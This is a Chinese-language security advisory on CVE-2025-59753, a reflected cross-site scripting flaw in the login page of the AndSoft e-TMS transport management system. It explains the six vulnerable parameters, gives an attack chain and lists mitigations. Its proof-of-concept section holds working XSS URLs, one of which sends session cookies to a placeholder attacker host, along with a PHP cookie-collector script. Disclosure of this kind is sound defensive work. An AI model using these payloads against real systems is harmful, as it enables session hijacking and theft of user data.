CVE-2025-59753：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59753

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59753 是 AndSoft 公司开发的 e-TMS（electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1 基础评分为 6.1 分，属于中危级别。

e-TMS 是一款广泛用于物流和运输行业的管理系统，帮助企业管理运输订单、车辆调度、货物跟踪等业务。由于该系统通常部署在企业内网或公网环境中，涉及大量业务数据和用户信息，因此其安全性至关重要。

该漏洞存在于 e-TMS 系统的登录页面路径 `/clt/LOGINFRM_BET.ASP` 中。具体而言，系统在处理 URL 参数时未对用户输入进行充分的过滤和编码，导致攻击者可以通过精心构造的恶意 URL，将 JavaScript 代码注入到页面中。当受害者点击该恶意链接时，嵌入的恶意脚本将在受害者的浏览器上下文中执行。

根据 CVSS 向量分析，该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），但需要用户交互（UI:R）。成功利用该漏洞后，攻击者可以窃取用户的会话凭证、Cookie 信息，或进行钓鱼攻击、恶意操作等，对系统的机密性和完整性造成低程度的影响。

技术细节

该反射型 XSS 漏洞的根本原因在于 e-TMS v25.03 的登录页面 `/clt/LOGINFRM_BET.ASP` 在处理多个 URL 参数时，未对用户输入进行适当的 HTML 实体编码或过滤。

具体而言，受影响的参数包括：`l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 共六个参数。这些参数的值会被服务器端直接反射回 HTML 响应页面中，而没有经过充分的输出编码（如 HTML 实体编码），使得攻击者可以在这些参数值中注入任意的 HTML 和 JavaScript 代码。

利用方式如下：
1. 攻击者构造一个包含恶意 JavaScript 代码的 URL，将 payload 嵌入到上述任一参数中；
2. 攻击者通过钓鱼邮件、即时通讯工具或社交工程等方式诱导受害者点击该恶意链接；
3. 受害者浏览器向 e-TMS 服务器发送请求，服务器将未经编码的参数值直接嵌入到返回的 HTML 页面中；
4. 浏览器解析返回的 HTML 时，执行攻击者注入的恶意 JavaScript 代码；
5. 恶意脚本在受害者的浏览器上下文中运行，可以窃取会话 Cookie、重定向用户到钓鱼页面、执行未授权操作等。

由于该漏洞需要用户交互（UI:R），攻击者必须诱导受害者主动点击恶意链接才能成功利用。同时，由于影响范围为 Changed（S:C），说明该漏洞的影响可以超出注入点所在的组件，波及其他安全域。

攻击链分析

STEP 1

步骤1：漏洞侦察

攻击者通过信息收集或安全扫描发现 AndSoft e-TMS v25.03 系统的登录页面 /clt/LOGINFRM_BET.ASP，并识别出 l、demo、demo2、TNTLOGIN、UO 和 SuppConn 等参数未经过滤处理。

STEP 2

步骤2：构造恶意 URL

攻击者将恶意 JavaScript payload 嵌入到上述任一参数中，构造一个包含 XSS 代码的完整 URL。Payload 通常用于窃取 Cookie、重定向或执行其他恶意操作。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、社交媒体、即时通讯工具等方式，将恶意 URL 发送给目标用户，利用社会工程学手段诱导用户点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接后，浏览器向 e-TMS 服务器发送请求，服务器将未编码的参数值直接嵌入到返回的 HTML 响应中，导致恶意脚本在受害者浏览器中执行。

STEP 5

步骤5：恶意操作执行

恶意 JavaScript 在受害者浏览器上下文中执行，可窃取会话 Cookie、重定向到钓鱼页面、窃取敏感信息或以受害者身份执行未授权操作。

STEP 6

步骤6：数据窃取与持久化

攻击者通过收集到的 Cookie 或凭证信息，冒充合法用户登录系统，进一步窃取业务数据或进行横向移动攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59753 - Reflected XSS PoC for AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_BET.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic cookie stealing via 'l' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?l=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

<!-- PoC 2: XSS via 'demo' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?demo=<script>alert('XSS-CVE-2025-59753')</script>

<!-- PoC 3: XSS via 'demo2' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?demo2="><script>alert(document.cookie)</script>

<!-- PoC 4: XSS via 'TNTLOGIN' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?TNTLOGIN=<img src=x onerror=alert('XSS')>

<!-- PoC 5: XSS via 'UO' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?UO=<svg onload=alert('XSS-CVE-2025-59753')>

<!-- PoC 6: XSS via 'SuppConn' parameter -->
http://target-server/clt/LOGINFRM_BET.ASP?SuppConn=<body onload=alert(document.domain)>

<!-- Attacker-side cookie collector (steal.php) -->
<?php
// steal.php - Collect stolen cookies
$cookie = $_GET['cookie'];
$logfile = fopen("stolen_cookies.txt", "a");
fwrite($logfile, $cookie . "\n");
fclose($logfile);
header('Location: http://target-server/clt/LOGINFRM_BET.ASP');
?>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对 Web 应用防火墙（WAF）进行规则更新，添加针对 /clt/LOGINFRM_BET.ASP 页面中特殊字符（如 <、>、"、'、script、onerror 等）的检测和阻断规则；2）在反向代理或 Web 服务器层面配置 URL 重写规则，对可疑请求进行拦截；3）为所有会话 Cookie 添加 HttpOnly 属性，降低 XSS 攻击窃取会话的风险；4）部署 CSP 头部策略，限制内联脚本执行；5）对用户进行安全意识培训，避免点击来源不明的链接；6）监控 Web 服务器日志，检测异常的请求模式。